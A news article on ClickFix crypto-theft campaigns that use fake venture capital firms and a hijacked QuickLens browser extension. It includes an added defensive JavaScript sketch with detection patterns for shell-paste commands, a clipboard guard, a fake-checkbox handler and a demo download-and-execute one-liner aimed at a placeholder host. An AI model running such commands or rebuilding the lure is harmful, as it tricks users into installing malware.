Hackers using “ClickFix” attacks to steal crypto have turned to impersonating venture capital firms and hijacking a browser extension in their two most recent campaigns.

According to a report by cybersecurity firm Moonlock Lab on Monday, scammers are using fake venture capital firms such as SolidBit, MegaBit and Lumax Capital. The hackers are using the firms to contact users via LinkedIn with partnership offers, then funneling them to fake Zoom and Google Meet links.

When a target clicks the fraudulent link, they are taken to an event page featuring a fake Cloudflare “I’m not a robot” checkbox. Clicking it silently copies a malicious command to the clipboard and then prompts the user to open their computer’s terminal and paste the so-called verification code. That “code” is the command itself; pressing Enter runs it and executes the attack.

“The ClickFix technique is what makes the final step so effective,” the Moonlock Lab team said. “By turning the victim into the execution mechanism—having them paste and run the command themselves—the attackers sidestep the very controls the security industry has spent years building. No exploit. No suspicious download.”
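The clipboard step above is the whole trick, so it is worth seeing it from both sides. The JavaScript below is an added example written for this article, not code from the Moonlock Lab report, from the campaign, or from any extension: it sketches the click handler of a fake verification page with a harmless placeholder command, and a guard that wraps the Clipboard API (navigator.clipboard.writeText in a browser, a stub object here) to log or refuse writes that look like something meant to be pasted into a terminal. The pattern list, the function names and the sample strings are assumptions made for this example and are not exhaustive.

```javascript
// Added example, not taken from the Moonlock Lab report or any real sample.
// Part 1: heuristics for clipboard text that is meant to be pasted into a
// terminal. Labels and regular expressions are assumed, not a complete ruleset.
const SHELL_PASTE_PATTERNS = [
  ["pipe-to-interpreter", /\|\s*(ba|z)?sh\b|\|\s*python3?\b/],
  ["remote-fetch", /\b(curl|wget)\b[^|\n]*https?:\/\//i],
  ["base64-decode", /\bbase64\s+(-d|--decode|-D)\b/],
  ["powershell-encoded", /\bpowershell(\.exe)?\b[^\n]*-(e|enc|encodedcommand)\b/i],
  ["lolbin", /\b(mshta|rundll32|regsvr32)\b/i],
  // ClickFix one-liners often carry a comment so the pasted text "looks like"
  // a verification step; the phrases here are constructed for the example.
  ["verification-bait", /#\s*(I am not a robot|verification|captcha)/i],
];

// Returns the labels of every pattern that matched, [] for benign text.
function classifyClipboardText(text) {
  const hits = [];
  for (const [label, re] of SHELL_PASTE_PATTERNS) {
    if (re.test(text)) hits.push(label);
  }
  return hits;
}

// Part 2: defensive wrapper. `clipboard` is anything with writeText(text)
// returning a promise (navigator.clipboard in a browser, a stub in tests).
// Suspicious writes are appended to `log`; with block === true they are also
// refused via a rejected promise, which keeps the API's async contract.
function guardClipboard(clipboard, { block = true, log = [] } = {}) {
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = (text) => {
    const str = String(text);
    const hits = classifyClipboardText(str);
    if (hits.length > 0) {
      log.push({ text: str, hits });
      if (block) {
        return Promise.reject(new Error(`clipboard write blocked: ${hits.join(", ")}`));
      }
    }
    return original(str);
  };
  return log;
}

// Part 3: what the fake "checkbox" does, in outline. The element's click
// handler copies a command and then shows the paste instructions. The command
// passed in by the caller is a placeholder, not a payload seen in the wild.
function fakeVerificationClick(clipboard, command) {
  return clipboard
    .writeText(command)
    .then(() => "Verification: open Terminal, press Cmd+V, then Enter");
}

// Constructed demo input (harmless; example.invalid never resolves).
const DEMO_COMMAND = 'curl -fsSL http://example.invalid/verify | sh # I am not a robot';
```

In audit mode (block: false) the guard only records, which is the safer starting point for an extension content script because legitimate sites do copy shell snippets; block mode refuses the write outright. Neither helps once the user has already pasted, so the controls that matter are an endpoint rule that alerts when Terminal or PowerShell spawns curl, base64 or an encoded command from an interactive one-liner, and telling users that no verification page ever needs them to open a terminal.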

Moonlock Lab alleges that a person using the name Mykhailo Hureiev, listed as the co-founder and managing partner at SolidBit Capital, has been a primary point of contact for the initial LinkedIn phase of the scam. Two X users have also reported suspicious conversations with a Hureiev account.

A user under the name Mykhailo Hureiev has allegedly been the primary point of contact for the scam's initial LinkedIn phase. Source: big dan

Moonlock Lab notes, however, that the campaign's infrastructure is built to rotate identities as soon as one front is exposed, so the firm and persona names above are unlikely to stay in use for long.

Chrome extension hijacked to steal crypto

Separately, a hijacked Chrome extension was, until it was pulled from the Chrome Web Store, spreading malware that also used the ClickFix technique.

QuickLens, an extension that lets users run Google Lens searches directly in their browser, was removed from the web store after it was compromised to push malware, John Tuckner, the founder of cybersecurity firm Annex Security, said in a Feb. 23 report.

After QuickLens changed ownership on Feb. 1, a new version released two weeks later contained malicious scripts that launched ClickFix attacks and other information-stealing tools, and Chrome's automatic extension updates delivered it to existing installs. Tuckner noted that the extension had around 7,000 users.

QuickLens was removed from the web store after it was compromised to push malware. Source: Annex Security

The hijacked extension reportedly searched for crypto wallet data and seed phrases in order to steal funds. It also scraped the contents of Gmail inboxes, YouTube channel data, and login credentials or payment information entered into web forms, according to an eSecurity Planet report on March 2.

ClickFix attacks are used to target many industries

The ClickFix technique has gained popularity among threat actors since last year, according to Moonlock Lab, because it tricks victims into running the malicious payload themselves, sidestepping the security tools that would block an automatic download or an exploit.

However, security researchers have been tracking its use since at least 2024, with targets spanning a wide range of industries.

Microsoft Threat Intelligence sent out a warning in August last year that it had been tracking “campaigns targeting thousands of enterprise and end-user devices globally every day.”

Meanwhile, cyber threat intelligence company Unit42 reported in July last year that the “relatively new social engineering technique” has been impacting industries such as manufacturing, wholesale and retail, state and local governments, and utilities and energy.

